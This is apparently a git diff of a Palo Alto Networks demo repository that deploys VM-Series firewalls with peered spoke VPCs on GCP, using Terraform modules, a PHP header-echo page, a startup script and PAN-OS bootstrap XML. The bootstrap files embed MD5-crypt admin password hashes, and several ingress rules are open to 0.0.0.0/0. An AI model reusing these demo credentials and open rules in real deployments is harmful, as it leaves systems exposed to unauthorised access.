b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/main.tf @@ -0,0 +1,83 @@ +resource "null_resource" "dependency_getter" { + provisioner "local-exec" { + command = "echo ${length(var.dependencies)}" + } +} + +resource "google_compute_instance" "vmseries" { + count = length(var.names) + name = element(var.names, count.index) + machine_type = var.machine_type + zone = element(var.zones, count.index) + min_cpu_platform = var.cpu_platform + can_ip_forward = true + allow_stopping_for_update = true + tags = var.tags + + metadata = { + mgmt-interface-swap = var.mgmt_interface_swap + vmseries-bootstrap-gce-storagebucket = var.bootstrap_bucket + serial-port-enable = true + ssh-keys = var.ssh_key + } + + service_account { + scopes = var.scopes + } + + network_interface { + + dynamic "access_config" { + for_each = var.nic0_public_ip ? [""] : [] + content {} + } + network_ip = element(var.nic0_ip, count.index) + subnetwork = var.subnetworks[0] + } + + network_interface { + dynamic "access_config" { + for_each = var.nic1_public_ip ? [""] : [] + content {} + } + network_ip = element(var.nic1_ip, count.index) + subnetwork = var.subnetworks[1] + } + + network_interface { + dynamic "access_config" { + for_each = var.nic2_public_ip ? [""] : [] + content {} + } + network_ip = element(var.nic2_ip, count.index) + subnetwork = var.subnetworks[2] + } + + boot_disk { + initialize_params { + image = var.image + type = var.disk_type + } + } + + depends_on = [ + null_resource.dependency_getter + ] +} + +resource "google_compute_instance_group" "vmseries" { + count = var.create_instance_group ? length(var.names) : 0 + name = "${element(var.names, count.index)}-${element(var.zones, count.index)}-ig" + zone = element(var.zones, count.index) + instances = [google_compute_instance.vmseries[count.index].self_link] + + named_port { + name = "http" + port = "80" + } + + lifecycle { + create_before_destroy = true + } +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/outputs.tf new file mode 100644 index 00000000..21b040a5 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/outputs.tf @@ -0,0 +1,24 @@ +output vm_names { + value = google_compute_instance.vmseries.*.name +} + +output vm_self_link { + value = google_compute_instance.vmseries.*.self_link +} + +output instance_group { + value = google_compute_instance_group.vmseries.*.self_link +} + +output nic0_public_ip { + value = var.nic0_public_ip ? google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip : [] +} + +output nic1_public_ip { + value = var.nic1_public_ip ? google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip : [] +} + +output nic2_public_ip { + value = var.nic2_public_ip ? google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip : [] +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/variables.tf new file mode 100644 index 00000000..9eaae5c9 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/variables.tf @@ -0,0 +1,102 @@ +variable subnetworks { + type = list(string) +} + +variable names { + type = list(string) +} + +variable machine_type { +} + +variable zones { + type = list(string) +} + +variable cpu_platform { + default = "Intel Broadwell" +} +variable disk_type { + default = "pd-ssd" + #default = "pd-standard" +} +variable bootstrap_bucket { + default = "" +} + +variable ssh_key { + default = "" +} + +variable public_lb_create { + default = false +} + +variable scopes { + type = list(string) + + default = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable image { +} + +variable tags { + type = list(string) + default = [] +} + +variable create_instance_group { + type = bool + default = false +} + +variable instance_group_names { + type = list(string) + default = ["vmseries-instance-group"] +} + +variable dependencies { + type = list(string) + default = [] +} + +variable nic0_ip { + type = list(string) + default = [""] +} + +variable nic1_ip { + type = list(string) + default = [""] +} + +variable nic2_ip { + type = list(string) + default = [""] +} + +variable mgmt_interface_swap { + default = "" +} + +variable nic0_public_ip { + type = bool + default = false +} + +variable nic1_public_ip { + type = bool + default = false +} + +variable nic2_public_ip { + type = bool + default = false +} diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vpc/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/main.tf new file mode 100644 index 00000000..0c614e1d --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/main.tf @@ -0,0 +1,27 @@ +resource "google_compute_network" "default" { + name = var.vpc + delete_default_routes_on_create = var.delete_default_route + auto_create_subnetworks = false +} + +resource "google_compute_subnetwork" "default" { + count = length(var.subnets) + name = element(var.subnets, count.index) + ip_cidr_range = element(var.cidrs, count.index) + region = element(var.regions, count.index) + network = google_compute_network.default.self_link +} + +resource "google_compute_firewall" "default" { + count = length(var.allowed_sources) != 0 ? 1 : 0 + name = "${google_compute_network.default.name}-ingress" + network = google_compute_network.default.self_link + direction = "INGRESS" + source_ranges = var.allowed_sources + + allow { + protocol = var.allowed_protocol + ports = var.allowed_ports + } +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vpc/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/outputs.tf new file mode 100644 index 00000000..3d64c11b --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/outputs.tf @@ -0,0 +1,24 @@ +output subnetwork_id { + value = google_compute_subnetwork.default.*.id +} + +output subnetwork_name { + value = google_compute_subnetwork.default.*.name +} + +output subnetwork_self_link { + value = google_compute_subnetwork.default.*.self_link +} + +output vpc_name { + value = google_compute_network.default.*.name +} + +output vpc_id { + value = google_compute_network.default.*.id[0] +} + +output vpc_self_link { + value = google_compute_network.default.*.self_link[0] +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vpc/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/variables.tf new file mode 100644 index 00000000..0f16be02 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/variables.tf @@ -0,0 +1,33 @@ +variable vpc { +} + +variable subnets { + type = list(string) +} + +variable cidrs { + type = list(string) +} + +variable regions { + type = list(string) +} + +variable allowed_sources { + type = list(string) + default = [] +} + +variable allowed_protocol { + default = "all" +} + +variable allowed_ports { + type = list(string) + default = [] +} + +variable delete_default_route { + default = "false" +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/project.tf b/gcp/adv_peering_2fw_2spoke_common/project.tf new file mode 100644 index 00000000..375e7eae --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/project.tf @@ -0,0 +1,18 @@ +terraform { + required_version = ">= 0.12" +} + +provider "google" { + #credentials = var.auth_file + project = var.project_id + region = var.regions[0] +} + +provider "google-beta" { + #credentials = var.auth_file + project = var.project_id + region = var.regions[0] + version = "> 3.0.0" +} + +data "google_compute_zones" "available" {} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke_common/scripts/showheaders.php b/gcp/adv_peering_2fw_2spoke_common/scripts/showheaders.php new file mode 100644 index 00000000..19c37318 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/scripts/showheaders.php @@ -0,0 +1,62 @@ + + SOURCE & DESTINATION ADDRESSES +
'; +echo ''. "INTERVAL" .': '. $time .'
'; +$localIPAddress = getHostByName(getHostName()); +$sourceIPAddress = getRealIpAddr(); +echo ''. "SOURCE IP" .': '. $sourceIPAddress .'
'; +echo ''. "LOCAL IP" .': '. $localIPAddress .'
'; + +$vm_name = gethostname(); +echo ''. "VM NAME" .': '. $vm_name .'
'; +echo ''. '
'; +echo ' + HEADER INFORMATION +
'; +/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */ +foreach ($_SERVER as $header => $value) { + if (substr($header, 0, 5) == 'HTTP_') { + /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */ + $clean_header = strtolower(substr($header, 5, strlen($header))); + + /* Replace underscores by the dashes, as the browser sends them */ + $clean_header = str_replace('_', '-', $clean_header); + + /* Cleanup: standard headers are first-letter uppercase */ + $clean_header = ucwords($clean_header, " \t\r\n\f\v-"); + + /* And show'm */ + echo ''. $header .': '. $value .'
'; + } +} +?> diff --git a/gcp/adv_peering_2fw_2spoke_common/scripts/webserver-startup.sh b/gcp/adv_peering_2fw_2spoke_common/scripts/webserver-startup.sh new file mode 100644 index 00000000..f799d23d --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/scripts/webserver-startup.sh @@ -0,0 +1,9 @@ +#!/bin/bash +sleep 120; +until sudo apt-get update; do echo "Retrying"; sleep 5; done +until sudo apt-get install -y php; do echo "Retrying"; sleep 5; done +until sudo apt-get install -y apache2; do echo "Retrying"; sleep 5; done +until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 5; done +until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 5; done +until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke_common/scripts/showheaders.php; do echo "Retrying"; sleep 2; done +until sudo systemctl restart apache2; do echo "Retrying"; sleep 5; done diff --git a/gcp/adv_peering_2fw_2spoke_common/spokes.tf b/gcp/adv_peering_2fw_2spoke_common/spokes.tf new file mode 100644 index 00000000..f808f011 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/spokes.tf @@ -0,0 +1,113 @@ +#----------------------------------------------------------------------------------------------- +# Create spoke2 vpc with 2 web VMs (with internal LB). Create peer link with trust VPC. +module "vpc_spoke1" { + source = "./modules/vpc/" + vpc = var.spoke1_vpc + subnets = var.spoke1_subnets + cidrs = var.spoke1_cidrs + regions = var.regions + allowed_sources = ["0.0.0.0/0"] + delete_default_route = true +} + +module "vm_spoke1" { + source = "./modules/vm/" + names = var.spoke1_vms + zones = [ + data.google_compute_zones.available.names[0], + data.google_compute_zones.available.names[1] + ] + subnetworks = [module.vpc_spoke1.subnetwork_self_link[0]] + machine_type = "f1-micro" + image = "ubuntu-os-cloud/ubuntu-1604-lts" + create_instance_group = true + ssh_key = fileexists(var.public_key_path) ? "${var.spoke_user}:${file(var.public_key_path)}" : "" + startup_script = file("${path.module}/scripts/webserver-startup.sh") +} + +module "ilb_web" { + source = "./modules/lb_tcp_internal/" + name = var.spoke1_ilb + subnetworks = [module.vpc_spoke1.subnetwork_self_link[0]] + all_ports = false + ports = ["80"] + health_check_port = "80" + ip_address = var.spoke1_ilb_ip + + backends = { + "0" = [ + { + group = module.vm_spoke1.instance_group[0] + failover = false + }, + { + group = module.vm_spoke1.instance_group[1] + failover = false + } + ] + } + providers = { + google = google-beta + } +} + +resource "google_compute_network_peering" "trust_to_spoke1" { + name = "${var.trust_vpc}-to-${var.spoke1_vpc}" + provider = google-beta + network = module.vpc_trust.vpc_self_link + peer_network = module.vpc_spoke1.vpc_self_link + export_custom_routes = true +} + +resource "google_compute_network_peering" "spoke1_to_trust" { + name = "${var.spoke1_vpc}-to-${var.trust_vpc}" + provider = google-beta + network = module.vpc_spoke1.vpc_self_link + peer_network = module.vpc_trust.vpc_self_link + import_custom_routes = true + + depends_on = [google_compute_network_peering.trust_to_spoke1] +} + +#----------------------------------------------------------------------------------------------- +# Create spoke2 vpc with VM. Create peer link with trust VPC. +module "vpc_spoke2" { + source = "./modules/vpc/" + vpc = var.spoke2_vpc + subnets = var.spoke2_subnets + cidrs = var.spoke2_cidrs + regions = var.regions + allowed_sources = ["0.0.0.0/0"] + delete_default_route = true +} + +module "vm_spoke2" { + source = "./modules/vm/" + names = var.spoke2_vms + zones = [data.google_compute_zones.available.names[0]] + machine_type = "f1-micro" + image = "ubuntu-os-cloud/ubuntu-1604-lts" + subnetworks = [module.vpc_spoke2.subnetwork_self_link[0]] + ssh_key = fileexists(var.public_key_path) ? "${var.spoke_user}:${file(var.public_key_path)}" : "" +} + +resource "google_compute_network_peering" "trust_to_spoke2" { + name = "${var.trust_vpc}-to-${var.spoke2_vpc}" + provider = google-beta + network = module.vpc_trust.vpc_self_link + peer_network = module.vpc_spoke2.vpc_self_link + export_custom_routes = true + + depends_on = [google_compute_network_peering.spoke1_to_trust] +} + +resource "google_compute_network_peering" "spoke2_to_trust" { + name = "${var.spoke2_vpc}-to-${var.trust_vpc}" + provider = google-beta + network = module.vpc_spoke2.vpc_self_link + peer_network = module.vpc_trust.vpc_self_link + import_custom_routes = true + + depends_on = [google_compute_network_peering.trust_to_spoke2] +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/terraform.tfvars b/gcp/adv_peering_2fw_2spoke_common/terraform.tfvars new file mode 100644 index 00000000..74734aad --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/terraform.tfvars @@ -0,0 +1,42 @@ +#project_id = "" # Your project ID for the deployment +#public_key_path = "~/.ssh/gcp-demo.pub" # Your SSH Key + +#fw_panos = "byol-904" # Uncomment for PAN-OS 9.0.4 - BYOL +#fw_panos = "bundle1-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 1 +#fw_panos = "bundle2-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 2 + + +#------------------------------------------------------------------- +regions = ["us-east4"] + +mgmt_vpc = "mgmt-vpc" +mgmt_subnet = ["mgmt"] +mgmt_cidr = ["192.168.0.0/24"] +mgmt_sources = ["0.0.0.0/0"] + +untrust_vpc = "untrust-vpc" +untrust_subnet = ["untrust"] +untrust_cidr = ["192.168.1.0/24"] + +trust_vpc = "trust-vpc" +trust_subnet = ["trust"] +trust_cidr = ["192.168.2.0/24"] + +spoke1_vpc = "spoke1-vpc" +spoke1_subnets = ["spoke1-subnet1"] +spoke1_cidrs = ["10.1.0.0/24"] +spoke1_vms = ["spoke1-vm1", "spoke1-vm2"] +spoke1_ilb = "spoke1-intlb" +spoke1_ilb_ip = "10.1.0.100" + +spoke2_vpc = "spoke2-vpc" +spoke2_subnets = ["spoke2-subnet1"] +spoke2_cidrs = ["10.2.0.0/24"] +spoke2_vms = ["spoke2-vm1"] +spoke_user = "demo" + +fw_names_common = ["vmseries01", "vmseries02"] +fw_machine_type = "n1-standard-4" + +extlb_name = "vmseries-extlb" +intlb_name = "vmseries-intlb" diff --git a/gcp/adv_peering_2fw_2spoke_common/variables.tf b/gcp/adv_peering_2fw_2spoke_common/variables.tf new file mode 100644 index 00000000..a33106a5 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/variables.tf @@ -0,0 +1,113 @@ +variable project_id { + description = "GCP Project ID" +} + +variable auth_file { + description = "GCP Project auth file" + default = "" +} + +variable regions { +} + +variable fw_panos { + description = "VM-Series license and PAN-OS (ie: bundle1-814, bundle2-814, or byol-814)" +} + +variable fw_image { + default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries" +} + +variable fw_names_common { + type = list(string) +} + +variable fw_machine_type { +} + +variable extlb_name { +} + +variable intlb_name { +} + +variable mgmt_vpc { +} + +variable mgmt_subnet { + type = list(string) +} + +variable mgmt_cidr { + type = list(string) +} + +variable untrust_vpc { +} + +variable untrust_subnet { + type = list(string) +} + +variable untrust_cidr { + type = list(string) +} + +variable trust_vpc { +} + +variable trust_subnet { + type = list(string) +} + +variable trust_cidr { + type = list(string) +} + +variable mgmt_sources { + type = list(string) +} + +variable spoke1_vpc { +} + +variable spoke1_subnets { + type = list(string) +} + +variable spoke1_cidrs { + type = list(string) +} + +variable spoke1_vms { + type = list(string) +} + +variable spoke1_ilb { +} + +variable spoke1_ilb_ip { +} + +variable spoke2_vpc { +} + +variable spoke2_subnets { + type = list(string) +} + +variable spoke2_cidrs { + type = list(string) +} + +variable spoke2_vms { + type = list(string) +} + +variable spoke_user { + description = "SSH user for spoke Linux VM" +} + +variable public_key_path { + description = "Local path to public SSH key. If you do not have a public key, run >> ssh-keygen -f ~/.ssh/demo-key -t rsa -C admin" +} diff --git a/gcp/adv_peering_4fw_2spoke/README.md b/gcp/adv_peering_4fw_2spoke/README.md new file mode 100644 index 00000000..c07f719e --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/README.md @@ -0,0 +1,40 @@ +## 4 x VM-Series / 2 x Spoke VPCs via Advanced Peering / ILBNH + +Terraform creates 4 VM-Series firewalls that secure ingress/egress traffic from spoke VPCs. The spoke VPCs are connected (via VPC Peering) to the VM-Series trust VPC. All TCP/UDP traffic originating from the spokes is routed to the internal load balancers. + +Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/gcp/adv_peering_4fw_2spoke/guide.pdf) for more information. + +### Diagram +
+

+ +

+ + +### Prerequistes +1. Valid GCP Account + +### How To +Setup Project (all commands are run from Google Cloud Terminal or from local machine with terraform v12.0 installed) +``` + $ gcloud services enable compute.googleapis.com + $ ssh-keygen -f ~/.ssh/ -t rsa -C + $ git clone https://github.com/wwce/terraform; cd terraform/gcp/adv_peering_4fw_2spoke +``` + +Run Build +``` + # Edit terraform.tfvars to match project ID, SSH Key, and PAN-OS version and license. + + $ terraform init + $ terraform apply +``` + +Destroy Build +``` + $ terraform destroy +``` + +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/authcodes b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/bootstrap.xml b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/bootstrap.xml new file mode 100644 index 00000000..e7e275ee --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/bootstrap.xml @@ -0,0 +1,898 @@ + + + + + + + + yes + + + $1$omtpasik$JVuMCKVuxaIHBIkdrbR4k. + + + + + yes + + + $1$kpolrmjb$lJ5t7tCjS7Ghd8tachjOJ. + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcHcrYU13Si9nTlJQZHhVM3d6RjMrWjZod1VtK1NLcVY2Snh4NWRJUUhwRkc2UVlKK2ZibFgyQmNoMzl0L0pBbXFiTm1OVm1kS3JOMVdwdjY3Y3J5SHNJYkRoOHFpMGZZS25ZZ1o5S0F6Nk1wWTgrMXdxbTR2dktXNXVSZU85YnhvNFRLNVIySUdVWnd1ZU0xZ0F5Q0xVWFA2ZnBsY3VQYUxvTDkvb2NuUUY0TUJKajhpOTkrZTNlcTUwd0w5YTgxTndVUVhuVzlDUXVqd0E2aVU0QytLU0tYTy91YVVlWEJ4YVVzVG92Y0FnKzFBVXdUdHJuSW1ySWNjYXllZy9ReXVTR2lZaEpOVTRLL2VNNkxJODlFMTBrR25JcTZTOEEzRUFtYU9IcUh3SFpsenJ3RlZJZFUxVVRhb1ArZXRna2I3TWNuUDQzOGtsa1JNcVRwMnNyakggdWJ1bnR1 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + yes + + + + + no + + + + + no + + + yes + + 1460 + + no + + + + + + + no + + + + + no + + + + + no + + + yes + + 1460 + + no + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/2 + 10 + 10.10.1.0/24 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/2 + 10 + 10.10.2.0/24 + + + + + + + + + + + + + updates.paloaltonetworks.com + + + + + download-and-install + 15 + + + + + + + download-and-install + 30 + + + + + US/Pacific + + yes + yes + + vm-series + + + 208.67.222.222 + 208.67.220.220 + + + + + yes + no + yes + no + + + yes + + no + + + + + yes + + + FQDN + + + + yes + no + yes + no + + + 8.8.8.8 + 4.2.2.2 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 22 + + + + + + + 221 + + + + + + + 222 + + + + + + + + + + + + any + + + any + + + any + + + any + + + any + + + any + + + ping + + + application-default + + + any + + yes + yes + allow + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + web-browsing + + + application-default + + + any + + yes + yes + allow + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + ssh + + + tcp-221 + tcp-222 + + + any + + yes + yes + allow + no + If required, this enables SSH access from the VM-Series untrust elastic/public IP to the web-server over TCP/221 and the db-server over TCP/222. + + + + + + + + + + ethernet1/2 + + + + + untrust + + + untrust + + + any + + + any + + service-http + ipv4 + no + + spoke1-intlb + 80 + + ethernet1/1 + + + + + + ethernet1/2 + + + + + untrust + + + untrust + + + any + + + any + + tcp-221 + ipv4 + + spoke1-vm + 22 + + ethernet1/1 + + + + + + ethernet1/2 + + + + + untrust + + + untrust + + + any + + + any + + tcp-222 + ipv4 + + spoke2-vm + 22 + + ethernet1/1 + + + + + + + deny + no + yes + + + deny + no + yes + + + + + + + + + + + any + + + any + + + critical + + any + client + any + disable + + + + + + + any + + + any + + + high + + any + client + any + disable + + + + + + + any + + + any + + + medium + + any + client + any + disable + + + + + + + any + + + any + + + critical + + any + server + any + disable + + + + + + + any + + + any + + + high + + any + server + any + disable + + + + + + + any + + + any + + + medium + + any + server + any + disable + + + + + + + + + + + + + WW's profile + + + +
+ + 10.10.2.2 + + spoke2-vpc + + + + 10.10.1.2 + + spoke1-vpc + + + + 10.10.1.0/24 + + spoke1-vpc + + + + 10.10.2.0/24 + + spoke2-vpc + + + + 10.10.1.100 + + spoke1-vpc + + +
+ + + + ethernet1/1 + ethernet1/2 + + + + + + color3 + + + color24 + + + color20 + + + color13 + + + +
+
+
+
+
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/init-cfg.txt b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/init-cfg.txt new file mode 100644 index 00000000..8d3c0290 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap \ No newline at end of file diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/authcodes b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/authcodes new file mode 100755 index 00000000..0519ecba --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/bootstrap.xml b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/bootstrap.xml new file mode 100644 index 00000000..90c524a9 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/bootstrap.xml @@ -0,0 +1,706 @@ + + + + + + $1$eyegmtyu$VFbNwpbaZ8sUG40wpdo/A/ + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u + + + + + yes + + + $1$xxqwnwvr$El9XN5KexgoltjkVjbkcd0 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + health-check + + + + + + + + 3 + 5 + wait-recover + + + + + no + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + loopback.1 + + + + + + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/1 + 10 + 35.191.0.0/16 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/1 + 10 + 130.211.0.0/22 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/1 + 10 + 10.10.1.0/24 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/1 + 10 + 10.10.2.0/24 + + + + + + + + + + + + + + + yes + no + yes + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + PA-VM + + + + yes + + + FQDN + + + + yes + no + yes + no + + + 8.8.8.8 + 4.2.2.2 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + loopback.1 + + + + + + + ethernet1/2 + + + + + + + + + + + + + trust + + + trust + + + gcp-health-probes + + + any + + + any + + + any + + + any + + + any + + + any + + allow + universal + no + + + + trust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + universal + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + + + + deny + no + yes + + + deny + no + yes + + + + + + + + trust + + + trust + + + gcp-health-probes + + + any + + any + ethernet1/1 + + loopback-interface + + No NAT on GCP LB health check. + + + + + + ethernet1/2 + + + + + untrust + + + trust + + + any + + + any + + any + + + + + + + + ethernet1/1 + ethernet1/2 + loopback.1 + + + +
+ + 35.191.0.0/16 + + gcp-resource + + + + 130.211.0.0/22 + + gcp-resource + + + + 100.64.0.1 + + gcp-resource + + Loopback interface for GLB healthcheck + +
+ + + + gcp-health-probe-1 + gcp-health-probe-2 + + + gcp-resource + + + + + + color6 + + + color13 + + + color24 + + +
+
+
+
+
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/init-cfg.txt b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/init-cfg.txt new file mode 100755 index 00000000..8d3c0290 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap \ No newline at end of file diff --git a/gcp/adv_peering_4fw_2spoke/diagram.png b/gcp/adv_peering_4fw_2spoke/diagram.png new file mode 100644 index 00000000..f45262b1 Binary files /dev/null and b/gcp/adv_peering_4fw_2spoke/diagram.png differ diff --git a/gcp/adv_peering_4fw_2spoke/fw_inbound.tf b/gcp/adv_peering_4fw_2spoke/fw_inbound.tf new file mode 100644 index 00000000..717d691e --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/fw_inbound.tf @@ -0,0 +1,76 @@ +#----------------------------------------------------------------------------------------------- +# Create bootstrap bucket for inbound firewalls +module "bootstrap_inbound" { + source = "./modules/gcp_bootstrap/" + bucket_name = "fw-bootstrap-inbound" + file_location = "bootstrap_files/fw_inbound/" + config = ["init-cfg.txt", "bootstrap.xml"] + license = ["authcodes"] 